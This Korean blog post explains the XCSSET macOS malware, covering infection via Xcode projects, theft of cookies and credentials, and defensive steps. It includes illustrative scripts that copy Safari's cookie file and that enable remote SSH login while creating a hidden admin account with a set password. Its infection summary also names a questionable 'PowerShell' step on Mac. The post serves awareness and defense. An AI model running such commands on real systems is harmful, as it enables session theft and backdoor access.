안녕하세요!
맥북(Mac)을 사용하면 해킹 걱정이 없다고 생각하셨나요?
그렇다면 오늘 이야기할 XCSSET 악성코드를 꼭 확인하세요! 😨
이 악성코드는 Mac 개발자와 일반 사용자를 모두 노리고 있으며,
한 번 감염되면 Apple ID, 브라우저 쿠키, 심지어 iCloud 데이터까지 탈취할 수 있습니다. 😱
📌 TL;DR (한줄 요약)
✅ XCSSET은 Mac을 노리는 악성코드로, 감염되면 Apple ID, 쿠키, 브라우저 데이터, 심지어 시스템까지 탈취 가능
✅ 감염 방식: Xcode 프로젝트 감염 → PowerShell 실행 → 백도어 설치 및 쿠키/데이터 유출
✅ MS 발표: 최근 XCSSET 변종이 등장, macOS 보안 정책을 우회하여 더욱 치명적
✅ PoC 코드 제공: 해커들이 어떻게 공격하는지 이해하고, 방어하는 방법까지 확인!
1️⃣ XCSSET이란? (Mac 유저들도 해킹의 표적이 될 수 있다!)
💡 XCSSET은 MacOS를 타겟으로 하는 악성코드로,
개발자와 일반 사용자 모두에게 영향을 미치는 매우 위험한 해킹 공격입니다.
이 악성코드는 처음에는 Xcode 프로젝트를 감염시켜 개발자들을 타겟으로 삼았지만,
최근에는 일반 Mac 사용자까지 공격 대상이 되었습니다.
📡 어떻게 감염될까? (XCSSET 감염 과정)
🛑 단순히 파일 하나 실행했을 뿐인데, 내 Mac이 감염될 수도 있다?! 😱
1️⃣ 감염된 Xcode 프로젝트 실행 → 악성코드가 자동으로 설치됨
2️⃣ macOS 권한 상승 (Privilege Escalation) 시도 → 보안 시스템을 우회하여 관리자 권한 획득
3️⃣ 사용자의 웹 브라우저 및 민감한 정보 탈취 → Safari, Chrome, Firefox 쿠키 및 로그인 정보 유출
4️⃣ 백도어 설치 → 감염된 기기를 계속해서 제어하고 추가 명령 실행
2️⃣ XCSSET이 수행하는 악성 행위
🔥 1. 웹 브라우저 쿠키 및 로그인 정보 탈취
✔️ 사용자가 로그인한 Apple ID, Google 계정, 이메일 등의 쿠키를 가로챔
✔️ Safari, Chrome, Edge 등의 보안 설정을 우회하여 세션 유지
📌 PoC 코드 (Safari 쿠키 탈취)
import os
import shutil
# Safari의 쿠키 저장소 경로
safari_cookies = "/Users/<username>/Library/Cookies/Cookies.binarycookies"
stolen_cookies = "/tmp/stolen_cookies.binarycookies"
# 쿠키 데이터 복사
shutil.copy(safari_cookies, stolen_cookies)
print("[+] Safari 쿠키 탈취 완료! 데이터 전송 준비 중...")
✅ 이 코드가 실행되면 Safari의 쿠키 파일을 훔쳐 로그인 세션을 가로챌 수 있음! 😱
🛑 2. macOS 시스템 설정 조작 및 백도어 설치
✔️ 감염된 Mac을 원격으로 제어 가능하도록 백도어 설치
✔️ Safari 보안 정책을 조작하여 악성 웹사이트 방문 유도
📌 PoC 코드 (백도어 생성 및 원격 접속)
#!/bin/bash
# XCSSET 백도어 설치 스크립트
echo "[+] 백도어 설치 중..."
# 원격 SSH 접속 허용
sudo systemsetup -setremotelogin on
# 악성 사용자 계정 추가
sudo dscl . -create /Users/hacker
sudo dscl . -passwd /Users/hacker P@ssw0rd123
sudo dscl . -append /Groups/admin GroupMembership hacker
echo "[+] 원격 제어 활성화 완료! 이제 공격자는 SSH로 접속할 수 있습니다."
✅ 이 코드를 실행하면 공격자는 원격으로 Mac에 접속할 수 있게 됨! 😨
3️⃣ 최근 Microsoft 발표: XCSSET 변종 등장!
Microsoft의 최신 사이버 보안 보고서(2024)에 따르면,
최근 XCSSET의 변종이 등장하여 기존보다 더 강력한 보안 우회 기술을 탑재한 것으로 밝혀졌습니다.
💥 MS가 발표한 주요 특징:
✔️ macOS Ventura 및 Sonoma 최신 보안 정책도 우회 가능
✔️ Xcode 프로젝트뿐만 아니라, 앱 설치 과정에서도 감염 가능
✔️ 피싱 공격과 결합하여, Apple ID 직접 탈취 시도
📢 Microsoft 보안팀은 기업 및 개발자들에게 Xcode 프로젝트를 다운로드할 때
각별한 주의를 기울일 것을 권고했습니다.
4️⃣ XCSSET 방어 방법 (내 Mac 지키는 법) 🛡️
📢 Mac도 이제 해킹의 표적! 아래 보안 조치를 지금 바로 실행하세요!
🔹 💻 Xcode 프로젝트 다운로드 주의
✔️ GitHub 등에서 프로젝트 다운로드 전 코드 리뷰 필수
✔️ codesign -dv --verbose=4 <파일명> 명령어로 서명된 코드 확인
🔹 🛑 macOS 보안 설정 강화
✔️ 시스템 설정 → 보안 및 개인정보 보호에서 불필요한 권한 차단
✔️ 관리자 계정 비밀번호 변경 및 2FA(이중 인증) 활성화
🔹 🔍 브라우저 보안 강화
✔️ 쿠키 자동 저장 비활성화
✔️ Safari, Chrome 등의 최신 보안 패치 적용 필수!
🔹 🛡️ 백신 및 보안 솔루션 사용
✔️ Trend Micro, Malwarebytes 같은 macOS 보안 솔루션 추천
✔️ 정기적인 보안 점검 및 시스템 업데이트 유지
🚀 결론: 당신의 Mac도 안전하지 않다!
💡 "나는 맥북 쓰니까 해킹 걱정 안 해도 돼!" 라고 생각했다면, 다시 생각해보세요!
💡 XCSSET은 Mac 개발자뿐만 아니라, 일반 사용자까지도 공격하는 강력한 악성코드입니다.
📌 ✅ 지금 당장 보안 점검을 수행하고, 위의 보안 조치를 따라하세요!
📢 추가적인 보안 관련 질문이나 정보가 필요하면 댓글로 남겨주세요! 😊🚀
'CyberSecurity > Security🔐' 카테고리의 다른 글
🚨 Parallels Desktop Zero-Day 취약점: 루트 접근 가능! 7개월간 방치된 충격적인 사실 (0) | 2025.02.25 |
---|---|
🚨 'Darcula' PhaaS: 클릭 한 번으로 피싱 공격, 현실이 되다! 🚨 (0) | 2025.02.23 |
🚨 북한 해커 조직 ‘Kimsuky’, Dropbox와 PowerShell로 남한 공격 중! 🚨 (0) | 2025.02.20 |
🚨 PostgreSQL & BeyondTrust 취약점 연계 해킹 위협! 내 데이터는 안전할까? 🔥 (0) | 2025.02.14 |
🛑 사이트에 있는 배너 광고도 해킹될 수 있을까? 🤔 (2) | 2025.02.05 |